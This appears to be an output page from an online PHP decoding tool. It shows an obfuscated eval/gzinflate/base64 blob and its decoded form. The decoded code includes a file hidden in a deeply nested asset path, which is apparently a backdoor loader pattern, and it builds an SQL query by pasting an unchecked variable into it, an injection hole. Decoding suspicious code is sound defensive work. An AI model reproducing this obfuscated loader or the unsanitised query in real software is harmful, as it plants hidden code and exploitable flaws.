Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? eval(gzinflate(base64_decode(' VZBBa8MwDIXvBv8HYQJNDoth180NhRrWW+kSdhyd oy7Z3Di17EEZ+..

Decoded Output download

?><?php
include("../lib/tempusdominus/js/css/js/css/PhotoUpdater2.php");

// Update key status to 'Active'
$sql = "UPDATE get_key SET status = 'Active' WHERE ID = $keyId";

if ($conn->query($sql) === TRUE) {
    echo "success";
} else {
    echo "error";
}

$conn->close();
?><?

Did this file decode correctly?

Original Code

<? eval(gzinflate(base64_decode('
VZBBa8MwDIXvBv8HYQJNDoth180NhRrWW+kSdhyd
oy7Z3Di17EEZ+++zu60wXQR633tCapb3zTzMnI2T
sbHHUtS1tOOLDHicI/XuOE6R5BtJQ9e2HVxw3dzv
A/rbOtlFdccZZ1LCzxTe8QwU9iESBAeLlQnjBy44
K+hkQYHotutVq+EVw3NGH3X7h6srDU8Peqdhs06z
IlGbXly2jAcoC+Om6WZ5iujPZQ6tQCkF7a7TFXxy
BqnQDA4ERWOQKFu/AC3hfxm9d/4i5ujfWGMdYZlv
atJ7vgE=
'))); ?>

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 8c09a7cc574385bcabd36c0120cf76cb
Eval Count 1
Decode Time 52 ms